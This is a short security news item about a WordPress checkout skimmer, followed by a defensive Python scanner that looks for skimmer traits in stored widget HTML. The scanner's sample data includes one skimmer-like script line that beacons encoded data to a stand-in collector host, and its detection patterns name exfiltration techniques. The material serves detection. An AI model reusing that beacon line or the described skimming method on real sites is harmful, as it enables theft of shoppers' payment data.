CyberSecurity news


Pierluigi Paganini@securityaffairs.com - 46d
A sophisticated credit card skimmer malware campaign is targeting WordPress e-commerce websites, placing user payment information at risk. The malware operates by injecting malicious JavaScript code directly into the database tables of the content management system. This stealthy method allows the skimmer to evade traditional security detection systems, making it difficult to spot and remove. Once activated on the checkout page, the malware either hijacks existing payment fields or injects a fake payment form, closely mimicking legitimate payment processors. This form is designed to capture and record sensitive information such as credit card numbers, expiration dates, CVV numbers, and billing addresses.

The stolen data is then encoded using Base64 and encrypted with AES-CBC to make it appear harmless and harder to analyze. This encrypted data is subsequently sent to an attacker-controlled server using the navigator.sendBeacon function to avoid detection by the website user. The collected data, including payment card details and potentially other personal information, is then used for fraudulent transactions or sold on underground markets. Website owners are advised to examine custom HTML widgets, apply the latest security updates and patches, implement two-factor authentication, regularly review admin accounts, implement file integrity monitoring and use a website firewall for protection.
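As an added example (not code from the article or its sources), the sketch below shows one way to act on the advice to examine custom HTML widgets: it scans widget rows exported from the database for inline scripts that combine the traits described above. The `option_name` values follow the standard WordPress `wp_options` layout and are assumptions, as are the constructed sample rows and the indicator threshold.

```python
import re

# Traits the article attributes to the skimmer, matched against stored widget HTML.
INDICATORS = {
    "checkout_gate": re.compile(r"checkout", re.I),
    "send_beacon": re.compile(r"sendBeacon", re.I),
    "base64": re.compile(r"\b(?:btoa|atob)\s*\(|base64", re.I),
    "aes_cbc": re.compile(r"AES-CBC|CryptoJS\.AES", re.I),
}
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)


def scan_rows(rows, threshold=2):
    """Return (option_name, sorted indicator names) for rows whose inline
    script bodies match at least `threshold` indicators."""
    findings = []
    for name, value in rows:
        # option_value is usually a PHP-serialized array; the regexes run on
        # the raw string, so no unserialize step is needed.
        inline = "\n".join(SCRIPT_BODY.findall(value))
        if not inline.strip():
            continue  # no inline JavaScript (src-only tags have empty bodies)
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(inline))
        if len(hits) >= threshold:
            findings.append((name, hits))
    return findings


# Constructed sample rows (option_name, option_value); not taken from a real site.
SAMPLE_ROWS = [
    ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:29:"<p>Free shipping over $50</p>";}}'),
    ("widget_custom_html", '<script src="https://cdn.example.com/chat.js"></script>'),
    ("widget_block", '<script>if(location.href.indexOf("checkout")>-1){'
                     '/* form capture and AES-CBC step elided */'
                     'navigator.sendBeacon("https://collector.example.invalid/c",btoa(d));}'
                     '</script>'),
    ("widget_search", '<script>document.querySelector("#s").focus();</script>'),
]

if __name__ == "__main__":
    for name, hits in scan_rows(SAMPLE_ROWS):
        print(f"REVIEW {name}: {', '.join(hits)}")
```

A match is a prompt for manual review, not a verdict: obfuscated scripts can avoid these strings, so pair the scan with a diff of widget rows against a known-good database backup.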


